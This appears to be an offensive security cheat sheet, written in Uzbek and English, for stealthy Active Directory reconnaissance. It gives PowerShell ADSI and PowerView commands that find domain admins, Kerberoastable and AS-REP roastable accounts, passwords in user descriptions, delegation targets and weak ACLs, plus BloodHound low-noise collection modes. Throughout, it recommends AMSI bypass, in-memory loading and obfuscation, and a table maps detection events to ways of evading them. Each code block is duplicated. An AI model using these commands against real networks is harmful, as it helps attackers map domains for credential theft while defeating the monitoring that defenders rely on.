AD Enumeration
LotL OPSEC
Living off the Land — ADSI, PowerView, BloodHound
True Living off the Land (ADSI & .NET)
net.exe yoki whoami.exe ishlatish Event ID 4688 (Process Creation) loqlari qoldiradi. Native .NET ADSI orqali LDAP so'rovlari to'g'ridan-to'g'ri xotiradan yuboriladi — process monitoring butunlay chetlab o'tiladi.
ADSI so'rovlari oddiy domain LDAP traffic kabi ko'rinadi. SOC uchun hech qanday shubhali signal yo'q.
PowerShellPowerShell
# [OPSEC] whoami.exe ishlatmasdan joriy foydalanuvchini aniqlash
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
# [ADSI] Domain Admins guruhini jimgina enumerate qilish
$Group = [ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=domain,DC=local"
$Group.Member
# [ADSI] Barcha domain foydalanuvchilarini raw LDAP orqali topish
$Searcher = [adsisearcher]"(&(objectCategory=person)(objectClass=user))"
$Searcher.FindAll() | ForEach-Object { $_.Properties.name }
# [ADSI] SPN ega (Kerberoastable) foydalanuvchilarni PowerView siz topish
$Searcher = [adsisearcher]"(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$Searcher.FindAll() | ForEach-Object { $_.Properties.samaccountname }
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
# [ADSI] Domain Admins guruhini jimgina enumerate qilish
$Group = [ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=domain,DC=local"
$Group.Member
# [ADSI] Barcha domain foydalanuvchilarini raw LDAP orqali topish
$Searcher = [adsisearcher]"(&(objectCategory=person)(objectClass=user))"
$Searcher.FindAll() | ForEach-Object { $_.Properties.name }
# [ADSI] SPN ega (Kerberoastable) foydalanuvchilarni PowerView siz topish
$Searcher = [adsisearcher]"(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$Searcher.FindAll() | ForEach-Object { $_.Properties.samaccountname }
Advanced PowerView (In-Memory)
PowerView ni yuklashdan oldin AMSI bypass ni xotirada ishga tushiring. Butun domenni bir vaqtda dump qilish o'rniga aniq, maqsadli so'rovlardan foydalaning.
Import-Module o'rniga IEX (iwr ...) orqali in-memory yuklash — disk ga fayl tushirmaydi.
PowerShellPowerShell
# In-memory import
Import-Module .\PowerView.ps1 -DisableNameChecking
# Kerberoastable foydalanuvchilar va SPNlarini topish
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
# AS-REP Roastable foydalanuvchilarni topish
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname
# Foydalanuvchi description larida parol qidirish
Get-DomainUser | Where-Object {$_.description -ne $null} | Select-Object samaccountname, description
# Unconstrained Delegation ruxsat berilgan hostlarni topish
Get-DomainComputer -Unconstrained | Select-Object name, dnshostname
# RBCD (Resource-Based Constrained Delegation) targetlarini topish
Get-DomainComputer | Where-Object {$_."msds-allowedtoactonbehalfofotheridentity"} | Select-Object name
# Xavfli ACL topish (GenericAll, WriteDacl va h.k.)
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -eq "TargetUser"}
Import-Module .\PowerView.ps1 -DisableNameChecking
# Kerberoastable foydalanuvchilar va SPNlarini topish
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
# AS-REP Roastable foydalanuvchilarni topish
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname
# Foydalanuvchi description larida parol qidirish
Get-DomainUser | Where-Object {$_.description -ne $null} | Select-Object samaccountname, description
# Unconstrained Delegation ruxsat berilgan hostlarni topish
Get-DomainComputer -Unconstrained | Select-Object name, dnshostname
# RBCD (Resource-Based Constrained Delegation) targetlarini topish
Get-DomainComputer | Where-Object {$_."msds-allowedtoactonbehalfofotheridentity"} | Select-Object name
# Xavfli ACL topish (GenericAll, WriteDacl va h.k.)
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -eq "TargetUser"}
BloodHound / SharpHound (OPSEC Modes)
SharpHound.exe -c All ishlatish LDAP so'rovlarida katta spike hosil qiladi va SAMR requestlari SOC tomonidan kuzatiladi. Targeted collection metodlaridan foydalaning.
DCOnly collection — faqat DC dan LDAP so'rovlari. Workstationlarga tegmaydi, SAMR yo'q — eng kam shovqinli usul.
PowerShellPowerShell
# [OPSEC] Stealth collection — faqat LDAP, workstation/SAMR yo'q
Invoke-BloodHound -CollectionMethod DCOnly -OutputDirectory C:\Windows\Temp\
# [OPSEC] Targeted session collection — faqat yuqori qiymatli targetlar
Invoke-BloodHound -CollectionMethod Session -ComputerFile targets.txt
# SharpHound siz native API orqali session enumeration
Get-NetSession -ComputerName TARGET_FILE_SERVER
Invoke-BloodHound -CollectionMethod DCOnly -OutputDirectory C:\Windows\Temp\
# [OPSEC] Targeted session collection — faqat yuqori qiymatli targetlar
Invoke-BloodHound -CollectionMethod Session -ComputerFile targets.txt
# SharpHound siz native API orqali session enumeration
Get-NetSession -ComputerName TARGET_FILE_SERVER
OPSEC Notes & Telemetry Matrix
| Texnika | Risk | EDR Telemetry | OPSEC Yechim |
|---|---|---|---|
| net.exe / whoami.exe | High | Event 4688 (Process Creation). EDR tomonidan kuzatiladi. | [ADSI] va WindowsIdentity dan foydalaning. |
| SharpHound (-c All) | High | Katta LDAP traffic spike. Event 4624/4634 barcha hostlarda. | -c DCOnly yoki targeted session. |
| PowerView | Medium | Event 4104 (PowerShell Script Block Logging). | AMSI patch, obfuscation, variable rename. |
| Native ADSI ([adsi]) | Very Low | Oddiy domain LDAP traffic kabi ko'rinadi. | N/A — eng stealth enumeration usuli. |